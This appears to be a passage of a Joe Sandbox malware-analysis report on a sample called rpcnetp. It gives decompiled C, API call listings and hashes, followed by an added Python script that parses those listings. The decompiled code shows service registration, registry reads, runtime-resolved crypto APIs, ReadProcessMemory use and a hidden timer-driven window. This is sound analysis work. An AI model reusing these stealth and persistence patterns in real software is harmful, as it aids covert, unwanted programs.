  • DefWindowProcA.USER32(?,00000011,?,?), ref: 72B2362C
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
  • String ID: d
  • API String ID: 2149785620-2564639436
  • Opcode ID: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
  • Instruction ID: 41688d1bd847d3f0796b27d825ea33bda349e247ae9f5fafea2125377e32a201
  • Opcode Fuzzy Hash: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
  • Instruction Fuzzy Hash: C731D132690314ABE7225A29CC8AF9B3AFDEB45797F11081CF50ED2183D3718558DB21
Uniqueness

Uniqueness Score: -1.00%

APIs
  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 72B2495C
  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 72B2497A
  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 72B24987
  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 72B24994
  • FreeLibrary.KERNEL32(?), ref: 72B249D8
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: AddressProc$Library$FreeLoad
  • String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
  • API String ID: 2449869053-171673395
  • Opcode ID: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
  • Instruction ID: da1224439bb4948f671e8665be7783c961a7690319e1cb8d5b89657dbbdfc4a5
  • Opcode Fuzzy Hash: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
  • Instruction Fuzzy Hash: 97415072900209AFDF12CF55CC84BDA7FB9EF85351F1481AABE09AF145D770A645CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A1495C
  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 00A1497A
  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00A14987
  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00A14994
  • FreeLibrary.KERNEL32(?), ref: 00A149D8
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: AddressProc$Library$FreeLoad
  • String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
  • API String ID: 2449869053-171673395
  • Opcode ID: fce7c67911c0af0a7ec1a690a8e324b2b471ad477e0889dd8751a2e32e61a377
  • Instruction ID: f458583bd07675f1e8cab8fdf3ed999d331f07b1b1f506764321ee9456250a26
  • Opcode Fuzzy Hash: fce7c67911c0af0a7ec1a690a8e324b2b471ad477e0889dd8751a2e32e61a377
  • Instruction Fuzzy Hash: B3415E72900608BFDF11CF54CC85EDA7FB9EF49740F0480A6BE08AF155D6B0AA85CBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E72B22658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0x72b260a4 = CreateEventA(0, 1, 0, 0);
				 *0x72b26010 = 0x10;
				 *0x72b2601c = 0x42a;
				 *0x72b26020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E72B21EEB);
				 *0x72b260bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0x72b26018 = 1;
					E72B22266();
					 *0x72b26018 = 5;
					E72B22266(4, 0, 0);
					E72B22296();
					 *0x72b2601c = 0;
					 *0x72b26020 = 0;
					_t11 = CreateThread(0, 0, E72B23161, 0, 0,  &_v12);
					_v8 = _t11;
					if(_t11 != 0) {
						WaitForSingleObject( *0x72b260a4, 0xffffffff);
						_t13 =  *0x72b2600c;
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0x72b26020 = _t24;
					}
					CloseHandle( *0x72b260a4);
					_t6 = E72B22266(1, 0, 0);
				}
				return _t6;
			}

Instruction addresses (per decompiled line): 0x72b22678 to 0x72b22755

APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B22668
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,72B21EEB), ref: 72B22697
    • Part of subcall function 72B22266: SetServiceStatus.ADVAPI32(72B26010,?,72B226C0,00000002,00001388,00000000), ref: 72B2228C
    • Part of subcall function 72B22296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
    • Part of subcall function 72B22296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
    • Part of subcall function 72B22296: RegEnumValueA.ADVAPI32 ref: 72B22300
    • Part of subcall function 72B22296: RegCloseKey.ADVAPI32(?), ref: 72B22309
  • CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B226F1
  • WaitForSingleObject.KERNEL32(000000FF), ref: 72B22714
  • PostMessageA.USER32 ref: 72B22724
  • WaitForSingleObject.KERNEL32(?,00007530), ref: 72B22732
  • CloseHandle.KERNEL32(?), ref: 72B22737
  • CloseHandle.KERNEL32 ref: 72B22743
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
  • String ID: rpcnet
  • API String ID: 2965456292-717388198
  • Opcode ID: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
  • Instruction ID: 02e831f8f98af63f743597e7f97a2177f381f5a52501a144112e9f4fabe84738
  • Opcode Fuzzy Hash: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
  • Instruction Fuzzy Hash: 87216BB2591364BBD7315B5B8C88F9B3EE8FB497E2B22091DF209D7142C3740900EBA0
Uniqueness

Uniqueness Score: -1.00%
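
The APIs lists on this page (including the indented "Part of subcall function" entries) are the fastest pivot into what the sample does, but the same module was dumped twice, once at base 72B20000 and once at base 00A10000, so every call is listed twice with different absolute addresses (compare the two advapi32.dll/CryptGenRandom blocks above). The parser below is an added example and is not part of the report or of any Joe Sandbox tooling; its input is text copied from the listings above. It turns each bullet line into a record carrying the call's RVA (ref minus the dump's Offset) so the two dumps can be merged, extracts the literal string arguments (the service and registry names), and lists the functions resolved through GetProcAddress, which are exactly the ones a static import-table check would miss.

```python
"""Parse the 'APIs' listings of this Joe Sandbox report into records and pivot
on them.  Added example; not code from the report, the sample or Joe Sandbox.
The sample text is copied from listings on this page."""
import re

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
OFFSET_LINE = re.compile(r"\bOffset:\s*([0-9A-Fa-f]+)")
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_block(text):
    """One function's APIs list plus its Memory Dump Source line -> records.
    Each record keeps the absolute ref and the RVA (ref minus the dump base),
    so one call can be recognised across differently based dumps."""
    base, records = None, []
    for line in text.splitlines():
        m = OFFSET_LINE.search(line)
        if m:
            base = int(m.group(1), 16)
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        records.append({"func": m.group("func"), "module": m.group("mod"), "args": args,
                        "ref": int(m.group("ref"), 16),
                        "subcall": m.group("sub")})   # set when the call sits inside a callee
    if base is None:
        raise ValueError("block has no 'Offset:' line to compute RVAs")
    for r in records:
        r["base"], r["rva"] = base, r["ref"] - base
    return records


def string_arguments(records):
    """Literal string arguments (names, paths, DLLs) the listing resolved."""
    return {a for r in records for a in r["args"] if a and a != "?" and not HEX_ARG.match(a)}


def resolved_imports(records):
    """Names fetched with GetProcAddress, i.e. calls absent from the import table."""
    return [r["args"][1] for r in records if r["func"] == "GetProcAddress" and len(r["args"]) > 1]


def merge_dumps(*blocks):
    """Group records from several dumps by (module, function, RVA)."""
    merged = {}
    for records in blocks:
        for r in records:
            merged.setdefault((r["module"], r["func"], r["rva"]), []).append(r["base"])
    return merged


# Sample input copied from the listings on this page (service routine E72B22658
# and the two Crypt* blocks, one per memory dump).
BLOCK_SERVICE = r"""
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B22668
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,72B21EEB), ref: 72B22697
    • Part of subcall function 72B22266: SetServiceStatus.ADVAPI32(72B26010,?,72B226C0,00000002,00001388,00000000), ref: 72B2228C
    • Part of subcall function 72B22296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
    • Part of subcall function 72B22296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
    • Part of subcall function 72B22296: RegEnumValueA.ADVAPI32 ref: 72B22300
    • Part of subcall function 72B22296: RegCloseKey.ADVAPI32(?), ref: 72B22309
  • CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B226F1
  • WaitForSingleObject.KERNEL32(000000FF), ref: 72B22714
  • PostMessageA.USER32 ref: 72B22724
  • WaitForSingleObject.KERNEL32(?,00007530), ref: 72B22732
  • CloseHandle.KERNEL32(?), ref: 72B22737
  • CloseHandle.KERNEL32 ref: 72B22743
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
"""
BLOCK_CRYPT_A = r"""
  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 72B2495C
  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 72B2497A
  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 72B24987
  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 72B24994
  • FreeLibrary.KERNEL32(?), ref: 72B249D8
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
"""
BLOCK_CRYPT_B = BLOCK_CRYPT_A.replace("72B2", "00A1").replace("Offset: 00A10000", "Offset: 00A10000") \
                             .replace("0000000072B21000", "0000000000A11000").replace("Offset: 00A20000", "Offset: 00A10000")


if __name__ == "__main__":
    svc = parse_block(BLOCK_SERVICE)
    print("service strings:", sorted(string_arguments(svc)))
    a, b = parse_block(BLOCK_CRYPT_A), parse_block(BLOCK_CRYPT_B)
    print("runtime-resolved:", resolved_imports(a))
    for key, bases in merge_dumps(a, b).items():
        print(key, [hex(x) for x in bases])
```

Every record also keeps its subcall marker, so the registry cleanup in E72B22296 shows up attributed to the service routine that calls it rather than being lost when only top-level calls are counted.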

C-Code - Quality: 84%
			E72B22314() {
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0x72b253c8);
				E72B24A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4);
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				if(ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34) == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				if(ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34);
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E72B215CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E72B2162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}

Instruction addresses (per decompiled line): 0x72b22314 to 0x72b22422

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22329
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2234A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22363
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22394
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2239C
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 72B223BF
  • ExitThread.KERNEL32 ref: 72B22422
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: MemoryProcessRead$Event$ExitHandleResetThread
  • String ID: x
  • API String ID: 2307309678-2363233923
  • Opcode ID: 1046eb34cbdf0b765d3cfa370b9ef56dd7c2329d757a53313fe159436fe1e0ad
  • Instruction ID: 39cbffadf330a72c51dfe75118ffe555f1184d41082d0e839d6b4843e77be50f
  • Opcode Fuzzy Hash: 1046eb34cbdf0b765d3cfa370b9ef56dd7c2329d757a53313fe159436fe1e0ad
  • Instruction Fuzzy Hash: 3E313A71910319EFEB11CBA9CE84EEEBBF9FB08316F104129E516F2091D774AA45CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
			E00A12314() {
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0xa153c8);
				E00A14A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4);
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				if(ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34) == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				if(ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34);
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E00A115CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E00A1162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}

Instruction addresses (per decompiled line): 0x00a12314 to 0x00a12422

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12329
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A1234A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12363
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12394
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A1239C
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 00A123BF
  • ExitThread.KERNEL32 ref: 00A12422
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: MemoryProcessRead$Event$ExitHandleResetThread
  • String ID: x
  • API String ID: 2307309678-2363233923
  • Opcode ID: 075bcaf98e5dd791630868526e830d259f0e5d8cc60576f0329b115a48e2c5d0
  • Instruction ID: b6af17b0f7911cb0660304d8bb744c489efc4f1456ba042e07f40eac7a05b786
  • Opcode Fuzzy Hash: 075bcaf98e5dd791630868526e830d259f0e5d8cc60576f0329b115a48e2c5d0
  • Instruction Fuzzy Hash: 9131257190021AEFDF21DBE4CD84FEDBBB9BB08314F144169E621B6090D778AA95CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B216BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}

Instruction addresses (per decompiled line): 0x72b216be to 0x72b2175b

APIs
  • EnterCriticalSection.KERNEL32(?), ref: 72B216E3
  • SetEvent.KERNEL32(?), ref: 72B216FA
  • SetEvent.KERNEL32(?), ref: 72B21707
  • WaitForSingleObject.KERNEL32(?,000007D0), ref: 72B2171F
  • CloseHandle.KERNEL32(?), ref: 72B2172B
  • CloseHandle.KERNEL32(?), ref: 72B2173F
  • CloseHandle.KERNEL32(?), ref: 72B2174C
  • DeleteCriticalSection.KERNEL32(?), ref: 72B21751
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
  • String ID:
  • API String ID: 2299618653-0
  • Opcode ID: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
  • Instruction ID: 2178e58ac556364a2b17c8ba54c2abf152cba4207c59054d382db62ef48bba22
  • Opcode Fuzzy Hash: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
  • Instruction Fuzzy Hash: 04113075610744ABCB21AE7ACD84BC7BBFCEF84795B115819E95EE3212E734E8008A64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A116BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}

Instruction addresses (per decompiled line): 0x00a116be to 0x00a1175b

APIs
  • EnterCriticalSection.KERNEL32(?), ref: 00A116E3
  • SetEvent.KERNEL32(?), ref: 00A116FA
  • SetEvent.KERNEL32(?), ref: 00A11707
  • WaitForSingleObject.KERNEL32(?,000007D0), ref: 00A1171F
  • CloseHandle.KERNEL32(?), ref: 00A1172B
  • CloseHandle.KERNEL32(?), ref: 00A1173F
  • CloseHandle.KERNEL32(?), ref: 00A1174C
  • DeleteCriticalSection.KERNEL32(?), ref: 00A11751
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
  • String ID:
  • API String ID: 2299618653-0
  • Opcode ID: 793d883e4e899669fe9bbacf2e7596f8678153195e8faccbd27405fd14b634f4
  • Instruction ID: cab75807c150e2e75d4836ca90c5957c47be791944fdb4ad262fa6cf47365af7
  • Opcode Fuzzy Hash: 793d883e4e899669fe9bbacf2e7596f8678153195e8faccbd27405fd14b634f4
  • Instruction Fuzzy Hash: 0F115279700744ABCB20EB75DC94AC7BBECAF08791B058819FA59D7250E734E881CEA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%
			E72B23161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x72b25430);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x72b260c4;
				 *0x72B26070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x72B26084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x72b26060);
				 *0x72b2600c = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				asm("sbb eax, eax");
				SetTimer( *0x72b2600c, 0x64, ( ~( *0x72b26038) & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x72b2600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E72B2159C(0, _t30);
			}

Instruction addresses (per decompiled line): 0x72b23161 to 0x72b23220

APIs
  • GetModuleFileNameA.KERNEL32(?,?,00000103,72B26060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 72B231A5
  • RegisterClassA.USER32 ref: 72B231AB
  • CreateWindowExA.USER32 ref: 72B231B1
  • SetTimer.USER32(00000064,?,00000000), ref: 72B231D9
  • GetMessageA.USER32 ref: 72B231E6
  • TranslateMessage.USER32(?), ref: 72B231F4
  • DispatchMessageA.USER32 ref: 72B231FE
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
